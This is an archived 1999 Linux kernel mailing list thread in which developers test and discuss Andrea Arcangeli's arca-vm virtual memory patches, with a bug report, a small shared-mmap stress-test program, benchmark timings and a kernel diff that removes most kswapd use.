  Cc: Linus Torvalds, Alan Cox, steve, bredelin, sct, linux-kernel,
	H.H.vanRiel, linux-mm

Andrea Arcangeli <andrea@e-mind.com> writes:

> On Mon, 4 Jan 1999, Andrea Arcangeli wrote:
> 
> > I am going to do something like that right now...
> 
> Here is a new patch (arca-vm-7). It practically removes kswapd everywhere
> except for ATOMIC memory allocations made while no process is already
> freeing memory. 
> 

You have a bug somewhere!

At this point (output of Alt-SysRq-M), machine locked:

Jan  5 03:49:14 atlas kernel: Free pages:         512kB 
Jan  5 03:49:14 atlas kernel:  ( Free: 128 (128 256 384) 
Jan  5 03:49:14 atlas kernel: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 4*128kB = 512kB) 

You probably have "<" instead of "<=", or a similar logic problem,
somewhere.

The bug revealed itself during an "mmap-sync" run. It's a program that
exercises a bug with shared mappings (you used to send patches for that
one, I don't know if they made it to the tree, so I check
occasionally).

Other than that, VM is really fast, in fact unbelievably fast. Kswapd
is very light on the CPU and interactive feel is great.
-- 
Zlatko

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05  3:02 64%                               ` Zlatko Calusic
@ 1999-01-05 11:49 64%                                 ` Andrea Arcangeli
  1999-01-05 13:23 62%                                   ` Zlatko Calusic
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-05 11:49 UTC (permalink / raw)
  To: Zlatko Calusic; +Cc: linux-kernel, linux-mm

On 5 Jan 1999, Zlatko Calusic wrote:

> At this point (output of Alt-SysRq-M), machine locked:

Were you able to continue using SysRq-K?

Could you reproduce it, press ALT-right+Scroll-Lock, and tell me what the
kernel was executing at that time...

Could you also send me the proggy for the shared mmaps so that I can
reproduce it?

Andrea Arcangeli


^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05 11:49 64%                                 ` Andrea Arcangeli
@ 1999-01-05 13:23 62%                                   ` Zlatko Calusic
  1999-01-05 15:42 64%                                     ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Zlatko Calusic @ 1999-01-05 13:23 UTC (permalink / raw)
  To: Andrea Arcangeli; +Cc: linux-kernel, linux-mm

[-- Attachment #1: Type: text/plain, Size: 811 bytes --]

Andrea Arcangeli <andrea@e-mind.com> writes:

> On 5 Jan 1999, Zlatko Calusic wrote:
> 
> > At this point (output of Alt-SysRq-M), machine locked:
> 
> Were you able to continue using SysRq-K?

Erm... I continued with *&#&%$ Alt-SysRq-{S,U,B}.
That worked for me. :)

> 
> Could you reproduce and press ALT-right+Scroll-Lock and tell me what the
> kernel was executing at that time...
>

I tried a few times, but to no avail. Looks like a subtle race, bad news
for you, unfortunately.

*BUT*, after I pressed ctrl-c against mmap-sync in one of the torture
tests, the program got stuck in down_failed (loadav += 2). A few minutes
later the machine got very unstable and I decided to reboot it. Go figure.

> Could you also send me the proggy for the shared mmaps so that I can
> reproduce it?
> 

Sure, just be careful. :)


[-- Attachment #2: Exercise shared mappings --]
[-- Type: application/octet-stream, Size: 1009 bytes --]

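#include <stdio.h>	/* perror, printf */
#include <stdlib.h>	/* exit */
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>	/* waitpid */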

/* 
 * file size, should be half of the size of the physical memory
 */
#define FILESIZE (32 * 1024 * 1024)

int main(void)
{
  char *ptr;
  int fd, i;
  char c = 'A';
  pid_t pid;

  /* O_CREAT requires an explicit mode argument */
  if ((fd = open("foo", O_RDWR | O_CREAT | O_TRUNC, 0644)) == -1) {
    perror("open");
    exit(1);
  }
  lseek(fd, FILESIZE - 1, SEEK_SET);
  /* write one byte to extend the file */
  write(fd, &fd, 1);

  /* get a shared mapping */
  ptr = mmap(0, FILESIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
  if (ptr == MAP_FAILED) { /* mmap reports failure as MAP_FAILED, not NULL */
    perror("mmap");
    exit(1);
  }

  /* touch all pages in the mapping */
  for (i = 0; i < FILESIZE; i += 4096)
    ptr[i] = c;

  while (1) {
    if ((pid = fork())) { /* parent, wait */
      waitpid(pid, NULL, 0);
    } else { /* child, exec away */
#if 0
      execl("/bin/echo", "echo", "blah", (char *)NULL);
#else
      fsync(fd);
      printf("blah\n");
      exit(0);
#endif
    }
    sleep(5);
  }
}

[-- Attachment #3: Type: text/plain, Size: 84 bytes --]


P.S. Apologies for too many jokes, I didn't sleep at all last night. ;)
-- 
Zlatko

^ permalink raw reply	[relevance 62%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-03  2:59 32%                 ` Andrea Arcangeli
  1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
@ 1999-01-05 13:33 62%                   ` Ben McCann
  1 sibling, 0 replies; 200+ results
From: Ben McCann @ 1999-01-05 13:33 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Steve Bergman, Linus Torvalds, Benjamin Redelings I,
	Stephen C. Tweedie, linux-kernel, Alan Cox, Rik van Riel,
	linux-mm

Hi Andrea,

My pet VM benchmark is the compilation of a set of about 50 C++
files which regularly grow the EGCS compiler VM size (as shown
by 'top') to 75 to 90 MB. I only have 64MB of RAM so it swaps a lot.

Here are the times (as measured by the 'time' command) for the
compilation of this suite of files (using 'make' and EGCS 1.0.1)
with 2.2.0pre4 and 2.2.0pre4 with your latest VM patch:

 TMS Compile with 2.2.0pre4
 589.830u 68.830s 18:09.88 60.4% 0+0k 0+0io 188062pf+260255w

 TMS Compile with 2.2.0pre4 and Andrea's latest patch
 597.840u 71.030s 21:59.36 50.6% 0+0k 0+0io 298514pf+237324w
                  ^^^^^^^^                  ^^^^^^

Note the wall-clock time increases from 18 minutes to almost
22 minutes and the number of page faults increases from 188,000
to 298,500. It seems something is invalidating pages too aggressively
in your patch.

Is there something I can tune to improve this? Is there an experiment
I can run to help fine-tune your VM changes?

-Ben McCann

-- 
Ben McCann                              Indus River Networks
                                        31 Nagog Park
                                        Acton, MA, 01720
email: bmccann@indusriver.com           web: www.indusriver.com 
phone: (978) 266-8140                   fax: (978) 266-8111

^ permalink raw reply	[relevance 62%]

* arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
  1999-01-05  0:52 64%                               ` Zlatko Calusic
  1999-01-05  3:02 64%                               ` Zlatko Calusic
@ 1999-01-05 15:35 28%                               ` Andrea Arcangeli
  1999-01-06 14:48 63%                                 ` Andrea Arcangeli
  2 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-05 15:35 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Alan Cox, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Tue, 5 Jan 1999, Andrea Arcangeli wrote:

> Here is a new patch (arca-vm-7). It practically removes kswapd for all places

I fixed some things in arca-vm-7. The new version is arca-vm-8.

The main change is the fix of the trashing_memory heuristic. Now the
free memory always stays between low and high, and it's left to the trashing
task to keep the limits up to date. This way I can run the swapout bench and
while :; do free; done, and the shell script _never_ gets blocked (as
opposed to arca-vm-7 and previous).

I went back to clearing the referenced flag on freed pages, since
it seems to make no performance difference and it looks cleaner to me (I 
removed it in the last patch because I hadn't benchmarked it and I
worried that it was the bit that made the difference against arca-vm-3).

The new patch goes back to allowing the pgcache to be shrunk even if the
pgcache is under min. This makes sense since this way shrink_mmap() is able
to really_swapout more pages even when we are really low on memory.

This new patch is much more efficient than the last one. I still don't
need kswapd...

I forgot to mention: I moved the swapout weight to an exponential behavior... 
(since the new patch as a whole is working much better, I have not compared
it with the linear /(priority+1) thing).

I guess the lockup that Zlatko reported is due to the bug he discovered (some
missing `()' ;). Thanks Zlatko. I tried a proggy that syncs some shared
mmaps and everything is fine here... 

I guess that this new code will also be much better than the last one on
low-memory machines...

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.67
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Tue Jan  5 16:17:00 1999
@@ -10,6 +10,14 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Developed the balanced page freeing algorithm (do_free_user_and_cache).
+ * Developed a smart mechanism to handle the swapout weight.
+ * Allowed the process to swapout async and only then get the credit from
+ * the bank. This has doubled swapout performances and fluidness.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -21,12 +29,15 @@
 #include <asm/pgtable.h>
 
 /* 
+ * When are we next due for a page scan? 
+ */
+static atomic_t nr_tasks_freeing_memory = ATOMIC_INIT(0);
+
+/* 
  * The wait queue for waking up the pageout daemon:
  */
 static struct task_struct * kswapd_task = NULL;
 
-static void init_swap_timer(void);
-
 /*
  * The swap-out functions return 1 if they successfully
  * threw something out, and we got a free page. It returns
@@ -163,7 +174,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +206,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +221,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +240,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +261,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +294,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +306,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +320,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +351,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +370,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm >> (priority>>1);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,7 +397,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
+
+	counter = calc_swapout_weight(priority);
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -374,23 +416,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -410,10 +446,11 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
@@ -440,40 +477,63 @@
                s = revision, i = -1;
        printk ("Starting kswapd v%.*s\n", i, s);
 }
+
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+	/*
+	 * NOTE: Here we allow also the process to do async swapout
+	 * because the swapout is really only a credit at the bank of
+	 * free memory right now. So we don't care to have it _now_.
+	 * Allowing async I/O we are going to improve drammatically
+	 * swapout performance -arca (discovered this afternoon ;) 980105
+	 */
+	if (swap_out(priority, gfp_mask & ~__GFP_WAIT))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		case 0:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
-	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+static int kswapd_free_pages(int kswapd_state)
+{
+	for(;;)
+	{
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
-	} while (time_before_eq(jiffies,end_time));
+		if (atomic_read(&nr_tasks_freeing_memory))
+			break;
+		if (kswapd_task->need_resched)
+			schedule();
+	};
 	return kswapd_state;
 }
 
@@ -496,13 +556,6 @@
 	lock_kernel();
 
 	/*
-	 * Set the base priority to something smaller than a
-	 * regular process. We will scale up the priority
-	 * dynamically depending on how much memory we need.
-	 */
-	current->priority = (DEF_PRIORITY * 2) / 3;
-
-	/*
 	 * Tell the memory management that we're a "memory allocator",
 	 * and that if we need more memory we should get access to it
 	 * regardless (see "try_to_free_pages()"). "kswapd" should
@@ -516,7 +569,6 @@
 	 */
 	current->flags |= PF_MEMALLOC;
 
-	init_swap_timer();
 	kswapd_task = current;
 	while (1) {
 		int state = 0;
@@ -543,107 +595,35 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
-
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
-	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
 
-		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
-		current->flags &= ~PF_MEMALLOC;
+	current->flags |= PF_MEMALLOC;
+	atomic_inc(&nr_tasks_freeing_memory);
+	while (count--)
+	{
+		static int state = 0;
+		if (!do_free_page(&state, gfp_mask))
+		{
+			retval = 0;
+			break;
+		}
 	}
-	unlock_kernel();
+	atomic_dec(&nr_tasks_freeing_memory);
+	current->flags &= ~PF_MEMALLOC;
 
+	unlock_kernel();
 	return retval;
 }
 
-/*
- * Wake up kswapd according to the priority
- *	0 - no wakeup
- *	1 - wake up as a low-priority process
- *	2 - wake up as a normal process
- *	3 - wake up as an almost real-time process
- *
- * This plays mind-games with the "goodness()"
- * function in kernel/sched.c.
- */
-static inline void kswapd_wakeup(struct task_struct *p, int priority)
+void kswapd_wakeup(void)
 {
-	if (priority) {
-		p->counter = p->priority << priority;
-		wake_up_process(p);
-	}
-}
+	struct task_struct * p = kswapd_task;
 
-/* 
- * The swap_tick function gets called on every clock tick.
- */
-void swap_tick(void)
-{
-	struct task_struct *p = kswapd_task;
-
-	/*
-	 * Only bother to try to wake kswapd up
-	 * if the task exists and can be woken.
-	 */
-	if (p && (p->state & TASK_INTERRUPTIBLE)) {
-		unsigned int pages;
-		int want_wakeup;
-
-		/*
-		 * Schedule for wakeup if there isn't lots
-		 * of free memory or if there is too much
-		 * of it used for buffers or pgcache.
-		 *
-		 * "want_wakeup" is our priority: 0 means
-		 * not to wake anything up, while 3 means
-		 * that we'd better give kswapd a realtime
-		 * priority.
-		 */
-		want_wakeup = 0;
-		pages = nr_free_pages;
-		if (pages < freepages.high)
-			want_wakeup = 1;
-		if (pages < freepages.low)
-			want_wakeup = 2;
-		if (pages < freepages.min)
-			want_wakeup = 3;
-	
-		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
-}
-
-/* 
- * Initialise the swap timer
- */
-
-void init_swap_timer(void)
-{
-	timer_table[SWAP_TIMER].expires = jiffies;
-	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	if (p && (p->state & TASK_INTERRUPTIBLE) &&
+	    !atomic_read(&nr_tasks_freeing_memory))
+		wake_up_process(p);
 }
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.5 linux/mm/page_alloc.c:1.1.1.1.2.18
--- linux/mm/page_alloc.c:1.1.1.5	Sun Jan  3 20:42:44 1999
+++ linux/mm/page_alloc.c	Tue Jan  5 16:17:00 1999
@@ -3,6 +3,7 @@
  *
  *  Copyright (C) 1991, 1992, 1993, 1994  Linus Torvalds
  *  Swap reorganised 29.12.95, Stephen Tweedie
+ *  memory_trashing heuristic. Copyright (C) 1998  Andrea Arcangeli
  */
 
 #include <linux/config.h>
@@ -250,17 +251,18 @@
 		 * a bad memory situation, we're better off trying
 		 * to free things up until things are better.
 		 *
-		 * Normally we shouldn't ever have to do this, with
-		 * kswapd doing this in the background.
-		 *
 		 * Most notably, this puts most of the onus of
 		 * freeing up memory on the processes that _use_
 		 * the most memory, rather than on everybody.
 		 */
-		if (nr_free_pages > freepages.min) {
+		if (nr_free_pages > freepages.min+(1<<order)) {
 			if (!current->trashing_memory)
+				goto ok_to_allocate;
+			if (current->flags & PF_MEMALLOC)
+				goto ok_to_allocate;
+			if (nr_free_pages > freepages.low+(1<<order))
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (nr_free_pages > freepages.high+(1<<order)) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
 			}
@@ -271,8 +273,11 @@
 		 * memory.
 		 */
 		current->trashing_memory = 1;
-		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
+		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + (1<<order)) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 			goto nopage;
+	} else {
+		if (nr_free_pages < freepages.min)
+			kswapd_wakeup();
 	}
 ok_to_allocate:
 	spin_lock_irqsave(&page_alloc_lock, flags);
Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.13
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Mon Jan  4 18:42:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/include/linux/swap.h
diff -u linux/include/linux/swap.h:1.1.1.4 linux/include/linux/swap.h:1.1.1.1.2.10
--- linux/include/linux/swap.h:1.1.1.4	Tue Dec 29 01:39:03 1998
+++ linux/include/linux/swap.h	Tue Jan  5 01:12:59 1999
@@ -83,6 +83,7 @@
 
 /* linux/mm/vmscan.c */
 extern int try_to_free_pages(unsigned int gfp_mask, int count);
+extern void kswapd_wakeup(void);
 
 /* linux/mm/page_io.c */
 extern void rw_swap_page(int, unsigned long, char *, int);
@@ -167,9 +168,11 @@
 	count = atomic_read(&page->count);
 	if (PageSwapCache(page))
 	{
+#if 0
 		/* PARANOID */
 		if (page->inode != &swapper_inode)
 			panic("swap cache page has wrong inode\n");
+#endif
 		count += swap_count(page->offset) - 2;
 	}
 	if (PageFreeAfter(page))


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 28%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05 13:23 62%                                   ` Zlatko Calusic
@ 1999-01-05 15:42 64%                                     ` Andrea Arcangeli
  1999-01-05 16:16 59%                                       ` Zlatko Calusic
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-05 15:42 UTC (permalink / raw)
  To: Zlatko Calusic; +Cc: linux-kernel, linux-mm

On 5 Jan 1999, Zlatko Calusic wrote:

> I tried few times, but to no avail. Looks like subtle race, bad news
> for you, unfortunately.

Hmm, I guess it was due to the wrong order shifting you pointed out a bit
before...

The lockup could be due to an oom loop. Ingo once pointed out that
raid1 (if I remember well) has one of them. Do you use raidx?

> Sure, just be careful. :)

Don't worry ;). Could you try if you can reproduce problems with
arca-vm-8? 

Andrea Arcangeli


^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05 15:42 64%                                     ` Andrea Arcangeli
@ 1999-01-05 16:16 59%                                       ` Zlatko Calusic
  0 siblings, 0 replies; 200+ results
From: Zlatko Calusic @ 1999-01-05 16:16 UTC (permalink / raw)
  To: Andrea Arcangeli

Andrea Arcangeli <andrea@e-mind.com> writes:

> On 5 Jan 1999, Zlatko Calusic wrote:
> 
> > I tried few times, but to no avail. Looks like subtle race, bad news
> > for you, unfortunately.
> 
> Hmm, I guess it was due to the wrong order shifting you pointed out a bit
> before...

Nope. I fixed that before compiling. :)
It's even in my PRCS tree, your patches and my parentheses. :)

linux-2.1 2204.3 Tue, 05 Jan 1999 00:15:24 +0100 by zcalusic
Parent-Version:      2204.2
Version-Log:         MM & no kswapd (andrea)

linux-2.1 2204.4 Tue, 05 Jan 1999 03:34:57 +0100 by zcalusic
Parent-Version:      2204.2
Version-Log:         arca-vm-7

> 
> The lockup could be due to an oom loop. Ingo once pointed out that
> raid1 (if I remember well) has one of them. Do you use raidx?
> 

Wow, that's a new variable in a story, I'm indeed using raid0 (IDE +
SCSI). That is it, then. Should I contact Ingo about that? I'm not on
linux-raid, so I never heard of a problem like that, in fact it
happened only yesterday I lost control of machine in such a strange
way.

> > Sure, just be careful. :)
> 
> Don't worry ;). Could you try if you can reproduce problems with
> arca-vm-8? 
> 

Huh, I must refuse your proposal, at least til' I get some
sleep. :(

Tomorrow is non-working day, so I'll spend some time reading stuff
(recently I bought Rubini's Device Drivers), and on the Thursday I'm
back to regular schedule, sleepless nights and arca-vm-10, at that
time, probably. :)

While at VM changes, I have one (reborn) objection. It looks like
recent kernels are once again very aggressive when it comes to copying
lots of data. That is, if you cp a few hundred MB, you effectively
finish with cleansed memory (populated with page cache pages) and
programs are on swap. Behaviour is practically identical in vanilla
Linus' tree and with your changes applied. Maybe you could, when
you're at it, see if that problem can be solved. With such
behaviour, Linux feels very sluggish, feels like NT crap.

I know it's a tough job, because I spent lots of time trying, but my
conclusion is that whenever you have good swapping speed, kernel will
outswap too much. On the other side if you fix that, swapping speed
drops. Tough luck. :(

I wish you good luck with your work, anyway.
-- 
Zlatko

^ permalink raw reply	[relevance 59%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
@ 1999-01-06 14:48 63%                                 ` Andrea Arcangeli
  1999-01-06 23:31 58%                                   ` Andrea Arcangeli
  1999-01-06 23:35 64%                                   ` Linus Torvalds
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-06 14:48 UTC (permalink / raw)
  To: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann
  Cc: Linus Torvalds, Alan Cox, bredelin, Stephen C. Tweedie,
	linux-kernel, Rik van Riel, linux-mm

On Tue, 5 Jan 1999, Andrea Arcangeli wrote:

> I fixed some thing in arca-vm-7. This new is arca-vm-8.

I've put out arca-vm-9.

It seems that marking all freed pages as not referenced in
__free_pages() is a loss, probably because shrink_mmap() doesn't like to
decrease the `count' on just-freed pages. So now I mark all freed pages as
referenced.

In the last patches (arca-vm-[78]) I forgot to include the filemap.c diff
that seems to improve performance here (allowing the swap cache to be
shrunk without caring about pgcache_under_min()).

arca-vm-9 returns to linear behavior in calculating the swapout weight.

You can download arca-vm-9 from here:

ftp://e-mind.com/pub/linux/kernel-patches/2.2.0-pre4-arca-VM-9

Let me know if you'll try it. Thanks!

Andrea Arcangeli


^ permalink raw reply	[relevance 63%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 14:48 63%                                 ` Andrea Arcangeli
